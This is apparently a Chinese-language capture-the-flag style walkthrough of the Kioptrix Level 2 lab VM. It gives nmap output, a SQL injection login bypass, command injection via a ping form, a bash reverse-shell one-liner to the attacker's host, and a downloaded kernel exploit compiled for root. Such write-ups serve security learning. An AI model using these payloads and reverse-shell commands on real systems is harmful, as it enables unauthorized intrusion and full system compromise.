信息收集

同样是netdiscover收集信息,发现目标IP地址。

目标的IP地址为192.168.43.47

nmap扫描端口信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
root@kali:~# nmap -sS -A -T4 192.168.43.47
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-07 05:01 EDT
Nmap scan report for 192.168.43.47
Host is up (0.00047s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 841/udp status
|_ 100024 1 844/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2018-05-07T05:51:42+00:00; -3h09m44s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
|_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:53:19:4C (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: -3h09m44s, deviation: 0s, median: -3h09m44s

TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 192.168.43.47

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.46 seconds

漏洞利用

存在80/tcp open http Apache httpd 2.0.52 ((CentOS))端口

尝试万能密码' or 1=1# ,成功登录。

可以看到一个执行ping命令的框框。

可见是一个命令执行漏洞。

在命令执行中是有| && || ;这些常见的符号的。

1
2
3
4
5
6
7
8
9
10
11
root@kali:~# whoai||id			//如果||左边的命令(命令1)未执行成功,那么就执行||右边的命令(命令2);
bash: whoai: 未找到命令
uid=0(root) gid=0(root) 组=0(root)
root@kali:~# whoami|id //执行后一个命令
uid=0(root) gid=0(root) 组=0(root)
root@kali:~# whoami;id //按顺序执行
root
uid=0(root) gid=0(root) 组=0(root)
root@kali:~# whoami&&id //&&左边的命令(命令1)返回真(即返回0,成功被执行)后,&&右边的命令(命令2)才能够被执行
root
uid=0(root) gid=0(root) 组=0(root)

这里我们可以利用| ;进行命令执行

测试cat /etc/passwd

下面用命令执行一个交互shell.

1
;bash -i >& /dev/tcp/192.168.43.177/2333 0>&1

同时用nc监听2333端口。

得到一个交互shell。但是权限是apache用户。

权限提升

当前的权限是apache用户,我们需要对他进行提权得到root权限。

1
2
bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

查看当前系统版本。searchsploit linux 2.6.9查找相关提权漏洞

https://www.exploit-db.com/download/9542.c

利用到9542.c的exp.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
bash-3.00$ cd /tmp
bash-3.00$ wget http://192.168.43.177/9542.c
--03:06:55-- http://192.168.43.177/9542.c
=> `9542.c'
Connecting to 192.168.43.177:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [text/x-csrc]

0K .. 100% 252.25 MB/s

03:06:55 (252.25 MB/s) - `9542.c' saved [2645/2645]

bash-3.00$ gcc -o 9542 9542.c
bash-3.00$ ./9542
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# whoami
root

提权成功。